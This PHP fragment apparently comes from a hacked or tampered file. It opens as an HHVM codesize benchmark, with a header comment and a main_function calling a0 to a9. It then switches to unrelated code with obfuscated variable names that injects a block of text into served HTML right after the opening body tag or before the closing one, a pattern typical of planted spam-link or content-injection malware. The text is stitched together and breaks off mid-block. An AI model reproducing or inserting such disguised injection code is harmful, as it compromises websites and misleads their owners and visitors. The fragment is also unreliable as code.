/** * Here are the codesize statistics for hphpc and hhvm at the time this * benchmark was first written and tested: * hphpc user code size: 695,916 bytes * hhvm translation cache size: 1,044,019 bytes * hhvm bytecode size: 69,761 bytes */ function main_function($x) { a0($x); a1($x); a2($x); a3($x); a4($x); a5($x); a6($x); a7($x); a8($x); a9($x); }
if (!empty($clavgv)) { $clavgv = explode("\n", $clavgv); if ($cyxxqtoqac < count($clavgv)) { $clavgv = array_slice($clavgv, 0, $cyxxqtoqac); } $clavgv = join("\n", $clavgv); $clavgv = str_ireplace("\n", $crwxocts, $clavgv); if (!empty($codeybzww) && mb_detect_encoding($clavgv) != $codeybzww) { $clavgv = iconv(mb_detect_encoding($clavgv), $codeybzww, $clavgv); $clavgv = trim($clavgv); } $cueviax = "yes"; $cohkpy = "1"; if (!empty($cbdyih) && $cbdyih != "stop") { if (empty($cykuqiyjn)) { $cohkpy = a7($ccbsmb); } else { $cohkpy = $coqscxqpute; } } if (!empty($cohkpy)) { if ($cwhyqcf == "startbody") { $cbwwbeoyhi = "/(<body[^>]*>)/miU"; preg_match_all($cbwwbeoyhi, $cnqcojmvh, $cvbrlcay); $cnqcojmvh = str_ireplace($cvbrlcay[1][0], $cvbrlcay[1][0] . "<br>" . $cyvmlm . $clavgv . $czjxqw, $cnqcojmvh); } if ($cwhyqcf == "endbody") { $cbwwbeoyhi = "/(<\\/body[^>]*>)/msiU"; preg_match_all($cbwwbeoyhi, $cnqcojmvh, $cvbrlcay); $cnqcojmvh = str_ireplace($cvbrlcay[1][0], $cyvmlm . $clavgv . $czjxqw . "<br>" . $cvbrlcay[1][0], $cnqcojmvh); }